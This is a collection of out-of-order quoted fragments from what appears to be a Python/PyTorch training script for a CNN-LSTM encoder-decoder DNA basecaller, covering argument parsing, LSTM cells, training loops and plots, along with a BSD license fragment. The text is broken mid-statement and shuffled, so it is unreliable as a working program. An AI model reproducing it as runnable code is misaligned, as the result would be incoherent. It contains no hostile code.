"fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation",
"1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden):",
"Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn =",
"trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest",
"> 1: nn.init.orthogonal_(param.data) def plot_error_accuarcy(input, pdf=None, steps=50, validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train,",
"self.lstm_decoder = lstm_decoder assert lstm_encoder.hidden_dim == lstm_decoder.hidden_dim, \"Hidden dimensions of encoder and decoder",
"self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False,",
"= self.init_hidden() # Forward pass through LSTM layer # shape of lstm_in: [batch,",
"of lstm_out: [batch, seq_len, output_dim] # shape of self.hidden: (a, b), where a",
"#arbitrary number of your choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update",
"F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate) hy = outgate",
"nargs='?', const=True, default=False) parser.add_argument('--gradient_clip', default=\"None\", help=\"Gradient clipping\") # early stopping parser.add_argument(\"--early_stop\", type=lambda x:bool(strtobool(x)),",
"c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates =",
"hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder',",
"= torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b, 1, hidden input =",
"encoder and decoder optimizer.step() if (val_ds != None) and (updates % make_validation ==",
"= labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting #############################",
"if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_train(input, pdf=None, editD=True): sns.set(font_scale=1)",
"running_editd_train = 0.0 running_editd_val = 0.0 updates = 0 heatmap_g = None heatmap_w",
"patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters",
"set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))), [v*100 for v in np.concatenate(np.array(list(acc_train.values())))],",
"= output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices",
"__init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder = cnn_encoder self.lstm_encoder = lstm_encoder self.lstm_decoder =",
"original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1,",
"labels_sorted, random_value, mode_type, beam_width) # seq_length x batch_size x out_size return out_decoder, labels_sorted,",
"shuffle=False): my_dataset = torch.utils.data.TensorDataset(tensor_x, tensor_y, sig_len, label_len, label10, read_idx) # create your datset",
"dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss",
"p.requires_grad) def init_weights_orthogonal_lstm(m): for name, param in m.named_parameters(): if \"weight\" in name and",
"= {} dict_training_editd2 = {} dict_validation_editd2 = {} dict_weights = {} dict_gradients =",
"has {count_parameters(model12):,} trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \"",
"OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN",
"def forward(self, x, hidden): h, c = hidden h = h.view(x.size(0), -1) c",
"if validation: ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit",
"torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc, dict_validation_acc, dict_training_editd, dict_validation_editd], [dict_training_loss2, dict_validation_loss2, dict_training_acc2, dict_validation_acc2,",
"0 # ed2 = old_ed # # old_ed = ed2 # epoch_editd +=",
"batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder =",
"{} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {}",
"dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val /",
"labels_val, lab_len_val, labels10_val, labels_val.size(1), mode) output_val = torch.transpose(output_val, 0, 1).contiguous() # input for",
"(torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our batch shape for input x is [batch,",
"= output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout #",
"= sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1,",
"unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens = original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:,",
"(c) 2021 (<EMAIL>) All rights reserved. Redistribution and use in source and binary",
"object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget",
"= bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4",
"#if teacher forcing, use actual next token as next input #if not, use",
"encoder and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder",
"default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) # LSTM",
"= {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 = {} dict_training_editd2 =",
"= hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h, c)",
"parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of",
"self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4",
"early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget =",
"= hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :,",
"0.0 running_editd_train = 0.0 running_editd_val = 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs),",
"plt.legend() plt.title(\"Edit Distance vs. updates\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\")",
"= F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden,",
"seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i]",
"# output gate start, end = n//2 + n//4, n input_biases[idx_b+3, idx] =",
"batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True,",
"loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0,",
"and \"lstm_decoder\" in name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0)",
"+ b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases), len(x_len))) for idx, u",
"hidden = (h, c) label = y[not_padded_batches, :, i] # batch-i, features, seq",
"* 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration",
"max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best performances on",
"with 0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size,",
"\"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases), len(x_len))) input_grad_biases = np.zeros((len(y_len_biases),",
"have shape (num_layers, batch_size, hidden_dim). if self.bidirectional: hidden1 = hidden[0] hidden2 = hidden[1]",
"val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3] label_len_val = val_ds[4] read_val = val_ds[5]",
"we are going to use teacher forcing or not teacher_force = random.random() <",
"hidden2 = hidden[1] h1 = torch.cat([hidden1[0:hidden1.size(0):2], hidden1[1:hidden1.size(0):2]], 2) h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2)",
"if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training edit distance\")",
"linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True):",
"i = 0 for p, label in zip(input, [\"input gate\", \"forget gate\", \"cell",
"elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val",
"acc_val, editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2,",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser #",
"break # when seq length (i) >= true seq length if i >=",
"(hy, cy), (torch.mean(ingate).cpu(), torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMdecoder(nn.Module): def __init__(self, input_dim, hidden_dim, batch_size,",
"a good default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0],",
"= trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch,",
"= criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val,",
"batch = args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF",
"args.tf_ratio reduced_TF = args.reduced_tf earlyStopping = args.early_stop patience_earlyStop = args.patience weight_decay = args.weight_decay",
"hspace=0.2, wspace=0.5) i = 0 for p, label in zip(input, [\"input gate\", \"forget",
"validation=True, editD=True): sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2],",
"4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input,",
"end) # cellgate, outgate start, end = n//2, n # ordering ingate, forgetgate,",
"'/training_result_{}'.format(fname)) train_set = read_data[0] val_set = read_data[1] train_set = [train_set[0].cuda(port), train_set[1].cuda(port), train_set[2].cuda(port), train_set[3].cuda(port),",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY",
"dict_activations_out_decoder = {} dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc",
"default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-CNN\") parser.add_argument(\"--batch_norm\", type=lambda x:bool(strtobool(x)), nargs='?', const=True,",
"n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate",
"dict_training_editd[epoch] = editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss,",
"optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import",
"error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\")",
"batch-i, features, seq len y = y[not_padded_batches, :, :] # batch-i, features, seq",
"a few hundreds, e.g. [batch size] = 32 is a good default value",
"ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate)",
"remove neagtive samples negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm =",
"= labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len",
"F import torchvision import pickle import random import time import matplotlib.pyplot as plt",
"input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx, :, :]",
"has, it will make a checkpoint of the current model if earlyStopping: early_stopping(np.mean(val_losses),",
"alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time Steps\") plt.ylabel(\"Activation\") if i ==",
"editd_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit",
"\"<PAD>\"} editd = 0 num_chars = 0 for idx, length in enumerate(target_lengths): length",
"plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax = fig.add_subplot(1, 3,",
"optimizer._optimizer.state_dict()} torch.save(checkpoint, save_files_path + '{}.pt'.format(fname)) #np.savez_compressed(save_files_path + '{}_weightsGradients.npz'.format(fname), weights=out12[4][0], gradients=out12[4][1]) pickle.dump(out12, open(save_files_path +",
"index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded items in the",
"updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses)",
"optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname),",
"unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True,",
"mode_type=\"train\", beam_width=1): ########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass,",
"= train_ds[3] label_len = train_ds[4] read_train = train_ds[5] #Get training data train_loader =",
"it has decresed, # and if it has, it will make a checkpoint",
"out_classes = 5 random.seed(SEED) np.random.seed(SEED) torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data",
"\"/\" + infile print(file_out) with open(file_out, 'rb') as handle: read_data = pickle.load(handle) save_files_path",
"self.hidden_dim).requires_grad_().cuda(self.port), torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port)) def forward(self, x, x_lengths): #hidden = self.init_hidden() # Forward",
"This is what we'll initialise our hidden state as return (torch.zeros(self.num_layers, self.batch_size, self.hidden_dim).requires_grad_().cuda(self.port),",
"unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren # unsort the output",
"self.reset_parameters() def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std,",
"seq len y = y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs",
"batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\",",
"= np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else: writer.add_scalar('Loss/train',",
"input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val,",
"1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0 running_acc_val = 0.0",
"kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input",
"= {} dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder =",
"true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :] # get only batches that are NOT padded",
"if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if",
"batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val,",
"if editD: cer = float(total_ed) / total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration),",
"ingate start, end = 0, n//4 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.)",
"= sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input,",
"args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port = args.gpu_port SEED",
"# indices of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val +=",
"cellgate, outgate = gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate =",
"self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout",
"if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\")",
"= matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b, idx] =",
"(seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1)",
"if epoch % print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0,",
"outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module): #Our",
"# # old_ed = ed2 # epoch_editd += ed # running_editd_train += ed",
"epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\")",
"locator puts ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(),",
"not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input, pdf=None, editD=True): sns.set(font_scale=1) loss_val, acc_val, editd_val",
"editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5,",
"f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target",
"with 10 reads, kernel size = 11 start = time.time() out12 = trainNet(",
"batch_size = true_y_len.size(0) max_for = range(max_label_len) outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max.",
"0 outputs[i, 0:input_decoder.size(0), :] = input_decoder # [max. target length, batch size, output",
"updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation',",
"[max. target length, batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True",
"0.25: # if we have reached half of the updates teacher_forcing_ratio = teacher_forcing_ratio",
"reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if editD: dict_training_editd[epoch]",
"dict_activations_in_decoder = {} dict_activations_forget_decoder = {} dict_activations_cell_decoder = {} dict_activations_out_decoder = {} dict_training_loss",
"plot_error_accuarcy_iterations_train(out12[0], pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__ == '__main__':",
"parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1,",
"{:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={},",
":, i] # batch-i, features, seq len y = y[not_padded_batches, :, :] #",
"= torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1 [batch size, SOS token] for",
"met: 1. Redistributions of source code must retain the above copyright notice, this",
"[batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :] labels10 = labels10[negative_idx,",
"= labels[negative_idx, :] labels10 = labels10[negative_idx, :, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn)",
"= n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2) # cell gate start,",
"val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2]",
"dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output_val = output_val.view(-1, output_val.size(2))",
"svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val,",
"self.output_dim) else: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 2, 1) #self.attn",
"port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size",
"type=int, default=1, help=\"Number of layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate",
"self.attention = attention self.dropout = dropout # Define the LSTM layer if self.bidirectional:",
"data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val,",
"import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping from",
"from early_stopping import EarlyStopping from cnn import SimpleCNN, BasicBlock, SimpleCNN_res from cnn import",
"bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters() def reset_parameters(self): std",
"= (reshaped_output_val[notpadded_index_val, :].argmax(1) == reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val +=",
"must reproduce the above copyright notice, this list of conditions and the following",
"x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm",
"= args.batch_size epochs = args.epochs make_validation = args.make_validation teacher = args.tf_ratio reduced_TF =",
"THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,",
"modification, are permitted provided that the following conditions are met: 1. Redistributions of",
"parser.add_argument(\"--input_bias_cnn\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('-c', '--channel_number', type=int, default=256, help=\"Number of output",
"default=256, help=\"Number of output channels in Encoder-CNN\") parser.add_argument('-l', '--cnn_layers', type=int, default=1, help=\"Number of",
"reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std) def",
"x, x_lengths): #hidden = self.init_hidden() # Forward pass through LSTM layer # shape",
"2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars =",
"#Print all of the hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\",",
"of layers in Encoder-CNN\") parser.add_argument('--pooling_type', default=\"None\", help=\"Pooling type in Encoder-CNN\") parser.add_argument('--strides', nargs='+', type=int,",
"heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing = 0 old_ed = 0 if",
"in %\") plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax =",
"gates.chunk(4, 1) ingate = F.sigmoid(ingate) forgetgate = F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate =",
"input_dim] # pack_padded_sequence so that padded items in the sequence won't be shown",
"= (h, c) label = y[not_padded_batches, :, i] # batch-i, features, seq len",
"of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of layers in Encoder-LSTM\")",
"distance= {0:.4f}\".format((epoch_editd / float(iteration + 1)))) if updates % make_validation == 0: print(\"=\"",
"C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir",
"has {:,} trainable parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping",
"val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end",
"shuffle) if val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val",
"= np.zeros((len(y_len_biases), len(x_len))) for idx, u in enumerate(x_len): idx_b = 0 matrix_param =",
"seq, feature), lstm_in_unroll, hidden = self.lstm_unroll(input, hidden) # [batch size, seq, hidden dim]",
"input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k:",
"the batch if i == max_in_batch: break # when seq length (i) >=",
"= port self.dropout=dropout # Define the LSTM layer self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers,",
"plt.legend() plt.title(\"Accuracy vs. updates from trainings set\") if editD: ax = fig.add_subplot(1, 3,",
"dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i,",
"int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS token = 1",
"acc running_acc_train += acc acc_iteration.append(acc) #if editD: # if updates % make_validation ==",
"split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\" in name and",
"accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates\") if editD: ax =",
"torch.manual_seed(SEED) torch.cuda.manual_seed(SEED) torch.backends.cudnn.deterministic = True # Load data dict_classes = {0: \"A\", 1:",
"encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden; attn_applied: b,",
"parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname = args.output port",
"GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 #",
"if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates)",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))),",
"few hundreds, e.g. [batch size] = 32 is a good default value CNN",
